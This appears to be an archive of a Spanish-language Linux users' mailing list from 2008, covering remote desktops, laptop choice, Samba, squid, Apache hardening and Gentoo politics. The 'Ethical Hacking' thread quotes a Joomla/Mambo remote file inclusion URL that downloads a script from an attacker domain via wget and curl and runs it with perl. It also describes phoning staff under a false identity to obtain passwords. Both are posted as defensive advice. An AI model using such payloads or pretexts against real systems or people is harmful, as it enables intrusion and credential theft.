siguiente problema. Tengo 4 servidores en un data center con CenTos 5.1 y tienen habilitado Ambiente Grafico (Gnome). Necesito saber como poder configurar los escritorios para que los desarrolladores puedan a traves de sus estaciones de trabajo con Fedora acceder a los CenTos desde su maquina y ver el entorno grafico de estos servidores CenTos. A la vez, necesito saber si existe algun cliente que pueda tomar estos escritorios (CenTos) pero desde M$ Windows ya que dos Desarrolladores usan XP por un tema de una aplicacion que solo corre en M$ vnc ;) a través de un túnel ssh Con vnc entraran todos a la misma sesion y no tendra una sesion en X cada usuario por separado. Y para que toda esta parafernalia? X es un sistema de ventanas /en red/, puedes configurar las cosas para login remoto grafico directamente. -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de InformaticaFono: +56 32 2654431 Universidad Tecnica Federico Santa Maria
Ethical Hacking, aspectos a considerar.
Lenin Hernández wrote: mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho JS, sql server 2k. No había leído nunca algo así ... Te advierto que el uso prolongado de M$ te puede freir las neuronas'' A que exactamente te refieres? algún ejemplo de lo que llamas 'directiva' o 'parametros'? Ok asumiendo que usas apache y no Cherokee ni lighttpd, Webrick o cualquier otro... Segun tus necesidades particulares buscando seguridad podrias: - reducir el tiempo de espera (tiemeout) - permitir o nop conexiones persistentes - si no tienes mucho trafico reducir el numero de peticiones a aceptar asi como el tiempo q debe transcurrir para otra peticion - usuario y grupo propio y exclusivo para apache - tal vez esconder la info del server vercion y modulos cargados - tal vez modificar o personalizar los mensajes de error del web server(error 403, 404 etc...) - instalar modulos de apache que te harian la vida mas bonita como mod_evasive (evita ataques de denegacion de servicio), mod_security etc... - restriccion de ip o rangos de ip etc.. - no permitir la ejecucion de cji's - entre muchos otros... Saludos , uso excesivo de javascript, ¿Why ? unmhh conexion a base de datos por javascripts'' uchh, validacion de formularios solo por javascript!! entre otros relacionados
Ethical Hacking, aspectos a considerar.
Rodrigo Fuentealba wrote: El 18/01/08, Horst H. von Brand [EMAIL PROTECTED] escribió: Lenin Hernández [EMAIL PROTECTED] wrote: [...] - si no tienes mucho trafico reducir el numero de peticiones a aceptar asi como el tiempo q debe transcurrir para otra peticion Esa clase de medidas reduce (no elimina!) la ventana de posibles vulnerabilidades. Y aumenta la posibilidad de denegaciones de servicio pues es más fácil saturarte de peticiones, a mi parecer. - usuario y grupo propio y exclusivo para apache En Windows?! NT sí; IUSR_NOMBREDELAMAQUINA, generalmente. PostgreSQL también tiene su usuario y grupo propio cuando se instala ahí. - tal vez esconder la info del server vercion y modulos cargados - tal vez modificar o personalizar los mensajes de error del web server(error 403, 404 etc...) Security through obscurity, isn't [No sacas nada con pintarlo de rosado para que no lo reconozcan como elefante por lo gris si te enfrentas a quien dispara a cuanta cosa grande se le pone delante... o (peor aun), quien se entero de tu truquito por algun medio. Por lo demas, /esta/ clase de trucos son tan faciles de llevar a cabo y tan obviamente seguros (y por tanto tan populares) que a lo mas detienen al script kiddie promedio unos pocos minutos. Para perspectiva, date una vueltecita por las cosas que puede hacer nmap sin demasiado esfuerzo, y consulta por alli por passive fingerprinting...] Seguridad por oscuridad no es seguridad, pero mientras detenga un tiempo más al posible victimario, igual sirve. Si voy arrancando de un sicario que me quiere matar y puedo tirarle sillazos para que tropiece, puedo escaparme. En realidad no sacas absolutamente nada al tratar de ocultar algo hoy en día ya que el software te hace miles de millones de cosas más de las que tu puedes hacer ... o sea, si ocultas algo por ejemplo en el sshd_conf le cambias el puerto al ssh, en cuanto tiempo piensas tu que te lo van reconocer? ... otra cosa por ejemplo es el filtrar con iptables el puerto 22 para que no te hagan un ataque por diccionario ... no sé una idea salu2 - instalar modulos de apache que te harian la vida mas bonita como mod_evasive (evita ataques de denegacion de servicio), mod_security etc... Si no los necesitas... mod_security es bonito pero a veces se torna complejo de configurar (sobretodo con varios sitios y varios requerimientos); úsalo con precaución. mod_evasive lo he probado y parece bueno, pero evalúa primero el historial de seguridad. - restriccion de ip o rangos de ip etc.. - no permitir la ejecucion de cji's Esa clase de cosas hay que cortarlas si no las requieres, obvio; si las requieres, las requieres... Intenta no requerirlas a toda costa. Muchas cosas que puedes hacer a través de un CGI también puedes hacerlas con funciones de PHP como módulo de apache (si le quitas las funciones peligrosas como popen y exec, y lo configuras bien...). Saludos,
Laptop para Linux
El vie, 18-01-2008 a las 16:16 -0300, Alberto Rivera escribió: Franco Catrin L. wrote: Hola! Necesito un poco de ayuda. Estoy cotizando un notebook para mi y me gustaria ver si en la lista hay gente que conozca algunos de los que me dan buena impresión. Hola Franco, mira lo mejor es que vayas a comprarlo con un livecd de ubuntu y uno de knoppix, así sabes altiro si funcionan todas las cosas, Para enfocar un poco las respuestas. Ya verifiqué la compatibilidad de ambos laptops, sólo quiero saber si al usar el core 2 duo puedo usarlo tranquilamente como un linux de 32 bits.. no me gustaría encontrarme con sorpresas del tipo : ahh pero el firmware de wlan es para 64 bits, tienes que usar linux de 64 bits. No conozco mucho de los procesadores actuales, y antes pasaba que aplicaciones de arquitecturas antiguas funcionaban mal en procesadores nuevos, por ejemplo aplicaciones de 16 bits en procesadores de 32. Si alguien ha visto alguno funcionar, ideal. A mi me basta el 530, pero si el otro me va a funcionar bien con linux de 32 bits, entonces es más atractivo aun. Gracias a todos -- Franco
Ethical Hacking, aspectos a considerar.
2008/1/18 Alberto Rivera [EMAIL PROTECTED]: Lenin Hernández wrote: mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho JS, sql server 2k. No había leído nunca algo así ... I know my friend, butLa necesidad tiene cara de ereje. Aunque aqui tengo un equipo con ubuntu preparado para atacar y hacer las pruebas que resuma de este hilo. De hecho estuve mirando las del ultimo correo, se ven bastante potentes. PD: ese server no es mio, solo me lo encacharon. Te advierto que el uso prolongado de M$ te puede freir las neuronas'' A que exactamente te refieres? algún ejemplo de lo que llamas 'directiva' o 'parametros'? Ok asumiendo que usas apache y no Cherokee ni lighttpd, Webrick o cualquier otro... Segun tus necesidades particulares buscando seguridad podrias: - reducir el tiempo de espera (tiemeout) - permitir o nop conexiones persistentes - si no tienes mucho trafico reducir el numero de peticiones a aceptar asi como el tiempo q debe transcurrir para otra peticion - usuario y grupo propio y exclusivo para apache - tal vez esconder la info del server vercion y modulos cargados - tal vez modificar o personalizar los mensajes de error del web server(error 403, 404 etc...) - instalar modulos de apache que te harian la vida mas bonita como mod_evasive (evita ataques de denegacion de servicio), mod_security etc... - restriccion de ip o rangos de ip etc.. - no permitir la ejecucion de cji's - entre muchos otros... Saludos , uso excesivo de javascript, ¿Why ? unmhh conexion a base de datos por javascripts'' uchh, validacion de formularios solo por javascript!! entre otros relacionados -- Saludos, LSM. Existen 10 tipos de personas: los que entienden binarios y los que no From [EMAIL PROTECTED] Fri Jan 18 17:56:09 2008 From: [EMAIL PROTECTED] (Alberto Rivera) Date: Fri Jan 18 17:59:26 2008 Subject: Ethical Hacking, aspectos a considerar. In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Asdtaker wrote: Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora de realizar un escaneo de vulnerabilidades a mi sitio web? Por ahora considero estos ITEMs: - Ingenieria Social: informacion disponible en la web. - Archivos por defecto: todo aquello que viene con la instalacion en bruto del server web. - Extensiones por defecto: analizar el impacto de soportar distintas extensiones. - Sesiones: comprobar validez de sesiones, etc. - Manejo de errores: de aplicacion y servidor. - SQL Injection. Gracias por sus comentarios. A una cosa, se me olvidaba con rkhunter, unhide, ckhrootkit o tripwire puedes mantener limpios los sistemas y puedes observar conflictos o bugs de los paquetes instalados así como modificaciones en el código que se hayan hecho en algún momento, son bastante buenos para mantener la seguridad en la máquina. salu2
Fwd: Laptop para Linux
El 18/01/08, Franco Catrin L. [EMAIL PROTECTED] escribió: El vie, 18-01-2008 a las 16:16 -0300, Alberto Rivera escribió: Franco Catrin L. wrote: Hola! Necesito un poco de ayuda. Estoy cotizando un notebook para mi y me gustaria ver si en la lista hay gente que conozca algunos de los que me dan buena impresión. Hola Franco, mira lo mejor es que vayas a comprarlo con un livecd de ubuntu y uno de knoppix, así sabes altiro si funcionan todas las cosas, Para enfocar un poco las respuestas. Ya verifiqué la compatibilidad de ambos laptops, sólo quiero saber si al usar el core 2 duo puedo usarlo tranquilamente como un linux de 32 bits.. no me gustaría encontrarme con sorpresas del tipo : ahh pero el firmware de wlan es para 64 bits, tienes que usar linux de 64 bits. No conozco mucho de los procesadores actuales, y antes pasaba que aplicaciones de arquitecturas antiguas funcionaban mal en procesadores nuevos, por ejemplo aplicaciones de 16 bits en procesadores de 32. Si alguien ha visto alguno funcionar, ideal. A mi me basta el 530, pero si el otro me va a funcionar bien con linux de 32 bits, entonces es más atractivo aun. Gracias a todos -- Franco Creo que el verdadero tema es el gráfico. Es una lata darse cuenta que los drivers de la placa de video no aceptan aplicaciones 3d en el escritorio, como Ubuntu Beryl. creo que hay que fijarse en eso. chaucha.
Ethical Hacking, aspectos a considerar.
Asdtaker wrote: 2008/1/18 Alberto Rivera [EMAIL PROTECTED]: Lenin Hernández wrote: mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho JS, sql server 2k. No había leído nunca algo así ... I know my friend, butLa necesidad tiene cara de ereje. Aunque aqui tengo un equipo con ubuntu preparado para atacar y hacer las pruebas que resuma de este hilo. try with Debian better, ubuntu it's made for desk's =) De hecho estuve mirando las del ultimo correo, se ven bastante potentes. PD: ese server no es mio, solo me lo encacharon. reemplazalo, todo lo que esta para software propietario esta en el software libre. Te advierto que el uso prolongado de M$ te puede freir las neuronas'' A que exactamente te refieres? algún ejemplo de lo que llamas 'directiva' o 'parametros'? Ok asumiendo que usas apache y no Cherokee ni lighttpd, Webrick o cualquier otro... Segun tus necesidades particulares buscando seguridad podrias: - reducir el tiempo de espera (tiemeout) - permitir o nop conexiones persistentes - si no tienes mucho trafico reducir el numero de peticiones a aceptar asi como el tiempo q debe transcurrir para otra peticion - usuario y grupo propio y exclusivo para apache - tal vez esconder la info del server vercion y modulos cargados - tal vez modificar o personalizar los mensajes de error del web server(error 403, 404 etc...) - instalar modulos de apache que te harian la vida mas bonita como mod_evasive (evita ataques de denegacion de servicio), mod_security etc... - restriccion de ip o rangos de ip etc.. - no permitir la ejecucion de cji's - entre muchos otros... Saludos , uso excesivo de javascript, ¿Why ? unmhh conexion a base de datos por javascripts'' uchh, validacion de formularios solo por javascript!! entre otros relacionados
Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
Horst H. von Brand escribió: Alvaro Herrera [EMAIL PROTECTED] wrote: Victor Hugo dos Santos escribió: On Jan 17, 2008 6:19 PM, Alvaro Herrera [EMAIL PROTECTED] wrote: Moises Alberto Lindo Gutarra escribió: [...] Postgres no se puede comprar de la misma forma, porque no hay accionistas ni entidad comercial alguna. Solo hay una comunidad y un repositorio de codigo que se entrega con licencia BSD. bueno.. de la misma manera no .. pero se podría comprar el código de cada uno (o de la mayoría) de los desarrolladores, cierto ??? creo que paso algo así con snort o otro que no me recuerdo ahora. Sí, pero no valdría nada, porque el código ya está liberado bajo licencia BSD, lo que significa que cualquier otro grupo de desarrolladores puede tomarlo y continuar desarrollando. El tema de snort no es el programa, sino los datos que usa para clasificar ataques etc. Esa base de datos cambia rapidamente, y cuesta montones mantenerla. Hmm, es posible; no tengo idea de snort. Yo hablaba de Postgres :-) Creo que el caso de snort es bien especial. -- Alvaro Herrera http://www.flickr.com/photos/alvherre/ ¿Cómo puedes confiar en algo que pagas y que no ves, y no confiar en algo que te dan y te lo muestran? (Germán Poo) From [EMAIL PROTECTED] Fri Jan 18 18:57:34 2008 From: [EMAIL PROTECTED] (Alvaro Herrera) Date: Fri Jan 18 19:00:57 2008 Subject: Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Horst H. von Brand escribió: [EMAIL PROTECTED] wrote: Basta recordar que hacer click tiene patente por parte de micro-soft. Creo que la patente es de Google. La unica patente de hacer click que me suena es el one-click shopping, o sea un sitio web que te permite comprar con un solo click (habiendo preconfigurado tus datos), y esa patente es de Amazon. Creo que ese solo ejemplo ilustra lo mal que está la industria del software. Si yo soy dueño del conocimiento soy dueño de sus ganancias. El conocimiento no tiene duen~o, que es exactamente lo que el libre movimiento de datos por Internet ha demostrado (y asi ha dado posibilidad de existir al codigo abierto como lo conocemos hoy). ... y que es justamente lo que los grandes consorcios intentan detener; por ejemplo el modelo de protección de contenido de Windows Vista [inserte cita obligada a Peter Gutmann aquí]. Afortunadamente para todos nosotros, parece ser que Windows Vista ha sido un fracaso. De lo contrario estaríamos empezando a ahogarnos en contenido protegido, esquemas raros que no son irrompibles pero que están protegidos por leyes idiotas, adolescentes en la cárcel por compartir contenido ilegalmente, etc etc. -- Alvaro Herrerahttp://www.advogato.org/person/alvherre Thou shalt check the array bounds of all strings (indeed, all arrays), for surely where thou typest foo someone someday shall type supercalifragilisticexpialidocious (5th Commandment for C programmers) From [EMAIL PROTECTED] Fri Jan 18 18:41:40 2008 From: [EMAIL PROTECTED] (Juan Pablo Chavol) Date: Fri Jan 18 19:06:46 2008 Subject: Laptop para Linux In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] El vie, 18-01-2008 a las 17:52 -0300, Franco Catrin L. escribió: El vie, 18-01-2008 a las 16:16 -0300, Alberto Rivera escribió: Franco Catrin L. wrote: Hola! Necesito un poco de ayuda. Estoy cotizando un notebook para mi y me gustaria ver si en la lista hay gente que conozca algunos de los que me dan buena impresión. Hola Franco, mira lo mejor es que vayas a comprarlo con un livecd de ubuntu y uno de knoppix, así sabes altiro si funcionan todas las cosas, Para enfocar un poco las respuestas. Ya verifiqué la compatibilidad de ambos laptops, sólo quiero saber si al usar el core 2 duo puedo usarlo tranquilamente como un linux de 32 bits.. no me gustaría encontrarme con sorpresas del tipo : ahh pero el firmware de wlan es para 64 bits, tienes que usar linux de 64 bits. No conozco mucho de los procesadores actuales, y antes pasaba que aplicaciones de arquitecturas antiguas funcionaban mal en procesadores nuevos, por ejemplo aplicaciones de 16 bits en procesadores de 32. Si alguien ha visto alguno funcionar, ideal. A mi me basta el 530, pero si el otro me va a funcionar bien con linux de 32 bits, entonces es más atractivo aun. Gracias a todos -- Franco Franco Acá tengo corriendo sin problemas Ubuntu y un compañero Fedora, no hemos tenido problema a la hora
Ethical Hacking, aspectos a considerar.
Alberto Rivera wrote: Asdtaker wrote: Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora de realizar un escaneo de vulnerabilidades a mi sitio web? Por ahora considero estos ITEMs: - Ingenieria Social: informacion disponible en la web. - Archivos por defecto: todo aquello que viene con la instalacion en bruto del server web. - Extensiones por defecto: analizar el impacto de soportar distintas extensiones. - Sesiones: comprobar validez de sesiones, etc. - Manejo de errores: de aplicacion y servidor. - SQL Injection. Gracias por sus comentarios. Mira toma nessus y lo corres desde el exterior y después desde el interior de la organización esto te va a encontrar varias vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y tratar de insertar exploits conocidos a servicios conocidos desde dentro y afuera cada vez, prueba varias herramientas en contra de tu sitio, trata de explotarlo de forma controlada, o sea, no lo hagas cuando estén todos trabajando ... esto te va a entregar una visión un poco más específica de cualquier problemática que puedas tener. Metasploit tiene buen desarrollo ahora. Tambien una utilidad que tiene la gente de Microsoft MBSA (Microsoft Baseline Analyzer) http://www.microsoft.com/spain/technet/seguridad/herramientas/mbsa.mspx Ahora para el desarrollo propiamente tal, prueba inyecciones de mysql, php y vulnerabilidades de javascript o ajax o lo que tengas, para hacer inyecciones de forma remota hay varias formas de hacerlo y están super documentadas incluso en youtube puedes encontrar videos bastante buenos ... a nivel de servidor elimina cualquier software que sirva para bajar cosas del internet para que no te puedan ejecutar ningún código dentro de la máquina Borrar ftp ? Un atacante con habilidades te crea un socket en ASP y adios downloaders. y para que imposibilites a los atacantes a hacer cosas como esta : http://tudominio/index.php?_REQUEST=_REQUEST%5boption%5d=com_content_REQUEST%5bItemid%5d= 1GLOBALS=mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?cmd=cd%20/tmp; wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; perl%20spkat.txt Eso son casos especificos de explotacion de Mambo o Joomla con RFI. Él dejo en claro hace rato que esta trabajando con IIS, asi que los wget, curl -O, etc( que hacen lo mismo ), no tendrian validez, aunque explotaciones de RFI sobre Windows dan resultado pero son un poco mas rebuscadas. si te fijas aquí el atacante no se fija ni en ingeniería social ni en datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu sitio tiene permiso de ejecutar cualquiera de las aplicaciones de descarga o navegación, con esto baja un paquete, para el ejemplo spkat.txt y después lo ejecuta con perl. El spkat lo que hace es abrir puertos, levantar servicios, ejecutar troyanos dentro de la máquina o cualquier cosa Ahora lo de la ingeniera social es para cuestiones super puntuales por ejemplo, para conseguir acceso a un sistema en red, por ejemplo llamas a la secretaria de administración y le dices que eres el gerente de operaciones y le pides un nombre de usuario y password del sistema, así puedes ver realmente cual es el nivel de seguridad que cuentas de parte de los usuarios ... pero la ing. social no es encontrar información en internet. eso, espero te sirva salu2
D. Robbins vs. Gentoo (era Guerra santa ...)
Horst H. von Brand escribió: Pedro GM [EMAIL PROTECTED] wrote: Horst H. von Brand escribió: Dame solo /un/ ejemplo de alguien de real estatura en codigo abierto que haya dejado el codigo abierto vendiendose al mejor postor. No se si al mejor postor, pero se que el creador de gentoo ... se fue de PLR en Gentoo, y otros llevaron a la distribucion a su estado actual... Hmm, no es así la historia que yo conozco. Primero se fue amigablemente, dejando a otros a cargo de la distribución. Fue a parar a Microsoft. Después trató de volver, pero tuvo serios problemas con algún individuo del grupo de desarrollo, quien por lo visto es también bastante difícil de tragar; y les dijo se va este, o me voy yo, creyendo que como era el demi-god creador iban a echar al otro, pero salió perdiendo :-) Hace un par de semanas alguien se dio cuenta que la fundación Gentoo se mandó un pastel administrativo muy grande, y Robbins hace notar que esto es sólo la punta del iceberg de una crisis de liderazgo en Gentoo. Mandó una propuesta para arreglar Gentoo, cuya principal condición era que todo la plana directiva actual dimita, y lo elijan a él como Dictador Supremo o algo por el estilo. Lo simpático de la historia parece ser que efectivamente casi toda la plana directiva ya ha dimitido. http://blog.funtoo.org/ -- Alvaro Herrera http://www.amazon.com/gp/registry/CTMLCN8V17R4 A male gynecologist is like an auto mechanic who never owned a car. (Carrie Snow) From [EMAIL PROTECTED] Fri Jan 18 21:05:03 2008 From: [EMAIL PROTECTED] (Graciela Urquieta) Date: Fri Jan 18 21:36:10 2008 Subject: PDC sanba Message-ID: [EMAIL PROTECTED] Hola, en mi oficina tenemos todos los equipos conectados a un PDC (AD de M$), pero resulta que en los ultimos tiempos los equipos con XP se desconectan pasado cierto tiempo, aspecto que imposibilita que se puedan compartir directorios e impresoras; por tal razon aprovechando que los administradores de la red estan migrando los servidores de email y web a linux, salio la opcion de migrar tambien el servidor PDC a un samba, mi duda es que si despues de la migracion el problema persista, no se si alguno de ustedes les paso algo similar o cual la mejor estrategia para armar un PDC con samba y tener clientes 2k y en su mayor parte xp, donde el PDC sea el encargado de brindar las impresoras y tambien se puedan compartir carpetas entre los clientes. Espero sus consejos y opiniones gracias Graciela From [EMAIL PROTECTED] Fri Jan 18 21:09:40 2008 From: [EMAIL PROTECTED] (Graciela Urquieta) Date: Fri Jan 18 21:36:50 2008 Subject: mysql samba Message-ID: [EMAIL PROTECTED] Hola, no se si existe la posibilidad de hacer uso de samba como PDC y tener como backend de usuarios y contraseñas a mysql, les consulto esto ya que en mi oficina se tienen gran parte de los servicios (intranet, email y nuestros sistemas de informacion) contrastados contra una BD mysql, y seria muy bueno si se lograse tambien que el PDC lo este. saludos Graciela.
filtros squid
En una red local que tiene salida a internet por medio de servidor con squid, como se puede hacer para tener un control en las descargas de archivos grandes, resulta que tenia filtrado que se puedan bajar archivos con ciertas extensiones (mp3, mov,avi, rar, etc) pero por ciertas necesidades tuvimos que habilitar algunas de estas, pero los usuarios aprovechan para descaragas sin mesura alguna, es asi que desearia poder permitir que descarguen este tipo de archivos pero limitarles el tamaño (algo asi: esta permitido bajar sol archivos de 5 mb y no mas grandes) Agradecer vuestras sugerencias. Joseph
host virtual por defecto
Cuando se configura host virtuales en apache, como se hace para predefinir un en especial, ya que he visto RHEL que en /etc/http/conf.d/ se encuentran todos los archivos de configuracion de host virtuales y queda por defecto el primero en orden alfabetico), existe alguna forma de establecer por defecto alguna de nujestra preferencia de forma especifica? Vladi From [EMAIL PROTECTED] Fri Jan 18 21:51:19 2008 From: [EMAIL PROTECTED] (Sebastian Antunez Noguera) Date: Fri Jan 18 21:54:28 2008 Subject: PDC sanba In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Hola, en mi oficina tenemos un Servidor Samba con LDAP y funciona de maravillas, fuera de ser PDC, es servidor de impresion y file server. Con las estaciones Windows no hemos tenido problemas y menos como el que mencionas de desconexion. Ahora los M$ se desconectan de los ADS por problemas de licencias generalmente, configuracion de Politicas de Dominio o de Seguridad de Dominio. Mi recomendación es Samba+LDAP, por la experiencia que hemos tenido, cero problemas, y buscando documentación, puedes tener mas seguridad que la ofrecido por M$ Saludos SAN El día 18/01/08, Graciela Urquieta [EMAIL PROTECTED] escribió: Hola, en mi oficina tenemos todos los equipos conectados a un PDC (AD de M$), pero resulta que en los ultimos tiempos los equipos con XP se desconectan pasado cierto tiempo, aspecto que imposibilita que se puedan compartir directorios e impresoras; por tal razon aprovechando que los administradores de la red estan migrando los servidores de email y web a linux, salio la opcion de migrar tambien el servidor PDC a un samba, mi duda es que si despues de la migracion el problema persista, no se si alguno de ustedes les paso algo similar o cual la mejor estrategia para armar un PDC con samba y tener clientes 2k y en su mayor parte xp, donde el PDC sea el encargado de brindar las impresoras y tambien se puedan compartir carpetas entre los clientes. Espero sus consejos y opiniones gracias Graciela From [EMAIL PROTECTED] Fri Jan 18 21:59:20 2008 From: [EMAIL PROTECTED] (Alvaro Herrera) Date: Fri Jan 18 22:02:29 2008 Subject: Laptop para Linux In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Franco Catrin L. escribió: HP 530: - Intel Core Duo T2300 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel® 945GML Express - 2 USB - Batería 4 celdas HP nx7400 - Intel Core 2 Duo T5500 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel® 945GM Express - 3 USB - Bateria 3 celdas Nadie comentó sobre las baterías, que me parece un parámetro interesante. Sobre todo porque es probable que una de ellas tenga harta menos capacidad de carga que la otra (mira la especificacion de mVA de cada una). Lo que especifiquen como duración de la batería será también un indicador de qué tan buena es la gestión de energía que te permita el chipset/procesador. Si los dos gastan lo mismo, entonces uno debería durar 25% más que el otro, pero lo más probable es que no sea así. -- Alvaro Herrera http://www.amazon.com/gp/registry/CTMLCN8V17R4 Hay quien adquiere la mala costumbre de ser infeliz (M. A. Evans) From [EMAIL PROTECTED] Fri Jan 18 21:59:53 2008 From: [EMAIL PROTECTED] (Alvaro Herrera) Date: Fri Jan 18 22:03:03 2008 Subject: Laptop para Linux In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Alberto Rivera escribió: Hola Franco, mira lo mejor es que vayas a comprarlo con un livecd de ubuntu y uno de knoppix, así sabes altiro si funcionan todas las cosas, en el pero de los casos no te va a funcionar las tarjetas que tienen chipset broadcom pero le pones fw-cuuter y listo ... Te dejó loco el fwcutter, por lo que se ve!!! -- Alvaro Herrera Developer, http://www.PostgreSQL.org/ ¿Que diferencia tiene para los muertos, los huérfanos, y aquellos que han perdido su hogar, si la loca destrucción ha sido realizada bajo el nombre del totalitarismo o del santo nombre de la libertad y la democracia? (Gandhi) From [EMAIL PROTECTED] Fri Jan 18 22:06:24 2008 From: [EMAIL PROTECTED] (Sebastian Antunez Noguera) Date: Fri Jan 18 22:09:32 2008 Subject: Como medir velocidad real en un Linux. Message-ID: [EMAIL PROTECTED] Estimados, en mi hogar tengo un enlace de 1Mb con 5 IP validas, el problema es que en horario diurno desde las 11:00 de la mañana hasta las 20:00 horas la velocidad disminuye bastante (20KB/S) maximo, pasado el horario se normaliza a superando los 100KB/S. En esta conexion solo hay un equipo conectado que es un Linux con CenTos 5.1con una de estas 5 IP configuradas. Necesito saber si es posible instalar alguna aplicacion que me mida la velocidad real, o que me sirva para detectar que sucede, ya que el proveedor me dice que esta todo bien. Gracias SAN From [EMAIL PROTECTED] Fri Jan 18 21:54:53 2008 From: [EMAIL PROTECTED] (Sebastian Antunez
D. Robbins vs. Gentoo (era Guerra santa ...)
Alvaro Herrera escribió: Horst H. von Brand escribió: Pedro GM [EMAIL PROTECTED] wrote: Horst H. von Brand escribió: Dame solo /un/ ejemplo de alguien de real estatura en codigo abierto que haya dejado el codigo abierto vendiendose al mejor postor. No se si al mejor postor, pero se que el creador de gentoo ... se fue de PLR en Gentoo, y otros llevaron a la distribucion a su estado actual... Hmm, no es así la historia que yo conozco. Primero se fue amigablemente, dejando a otros a cargo de la distribución. Fue a parar a Microsoft. Después trató de volver, pero tuvo serios problemas con algún individuo del grupo de desarrollo, quien por lo visto es también bastante difícil de tragar; y les dijo se va este, o me voy yo, creyendo que como era el demi-god creador iban a echar al otro, pero salió perdiendo :-) Esa era la historia que yo sabia en el tiempo que usaba gentoo en una maquinita y me paseaba de vez en cuando por los foros de gentoo. Hace un par de semanas alguien se dio cuenta que la fundación Gentoo se mandó un pastel administrativo muy grande, y Robbins hace notar que esto es sólo la punta del iceberg de una crisis de liderazgo en Gentoo. Mandó una propuesta para arreglar Gentoo, cuya principal condición era que todo la plana directiva actual dimita, y lo elijan a él como Dictador Supremo o algo por el estilo. Hasta aqui sabia muy poco , sabia lo del problema con los de la directiva pero no sabia que se habia ido de sin pena ni gloria. Lo simpático de la historia parece ser que efectivamente casi toda la plana directiva ya ha dimitido. Lo poco que se es que no se han podido levantar muy bien. http://blog.funtoo.org/ -- .:: Pedro:G:M ::. Linux User #397462 http://counter.li.org From [EMAIL PROTECTED] Fri Jan 18 22:54:15 2008 From: [EMAIL PROTECTED] (Ismael Cantieri) Date: Fri Jan 18 23:25:04 2008 Subject: Laptop para Linux In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] El día 18/01/08, Franco Catrin L. [EMAIL PROTECTED] escribió: Hola! Necesito un poco de ayuda. Estoy cotizando un notebook para mi y me gustaria ver si en la lista hay gente que conozca algunos de los que me dan buena impresión. Estoy entre un HP530 y un HP nx7400 Los componentes diferentes son: HP 530: - Intel Core Duo T2300 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel(R) 945GML Express - 2 USB - Batería 4 celdas HP nx7400 - Intel Core 2 Duo T5500 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel(R) 945GM Express - 3 USB - Bateria 3 celdas Mi principal duda es acerca del procesador. Yo no pienso usar un Linux de 64 bits, me funcionaria todo bien si uso un Linux de 32 bits en el Intel Core 2 Duo ? Por ahi vi que el nx7400 tiene pantalla no reflectante, me parecen mas agradables de usar. Alguien sabe cómo es la pantalla del hp 530? Saludos y gracias de antemano -- Franco Consulta y digan si estoy equivocado pero por lo que supe algunas HP nuevas tenían problemas en la bios con los kernel nuevos. eso se soluciono??? no recuerdo modelos pero creo que eran f505 o algo así -- Ismael Cantieri www.cantieri.tk exten = s,1,Playback(applause) exten = s,n,Playback(thankyou) Linux user #409459 Ubuntu User # 9265 From [EMAIL PROTECTED] Sat Jan 19 00:44:14 2008 From: [EMAIL PROTECTED] ([EMAIL PROTECTED]) Date: Sat Jan 19 00:47:24 2008 Subject: Fwd: Re: Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL Message-ID: [EMAIL PROTECTED] Horst H. von Brand [EMAIL PROTECTED] ha escrito: [EMAIL PROTECTED] wrote: Yo creo que es cierto que el software libre es un peligro para las ganancias egoÃstas o para el modelo neoliberal (M$ y otras) Es un peligro para el modelo de negocio de le vendemos la cajita con la licencia, claro. Otros modelos de negocio (tanto o mas neoliberales que ese) funcionan de lo mas bien con codigo abierto, gracias. Por cierto que hay buenos negocios en el código abierto en especial para aquellos para el cual su producto requiere una buena parte de software, google, hp, dell, etc. Y continuaran apoyando el opensource ya que disminuye sus costos o les permite agregar nuevas funciones a costo reducido. Pero el peligro para el mercado no esta en distribuir o generar opensource. Espero explicarlo bien, el cuento es largo. hace pocos años creíamos que el conocimiento era un patrimonio de la humanidad, una conquista de la evolución humana. Ahora el conocimiento se está aceleradamente convirtiendo en una patente, en una mercancía, en un secreto de empresas transnacionales que lo consideran ya no como un patrimonio del ser humano, sino como una propiedad privada. Porque dirá Ud. Porque la mayor ganancia de capitales ya no esta en la explotación de la tierra, sino en las patentes que generan el conocimiento. Es cosa de ver cuanto vale una nueva droga que trata el sida, el cáncer y un 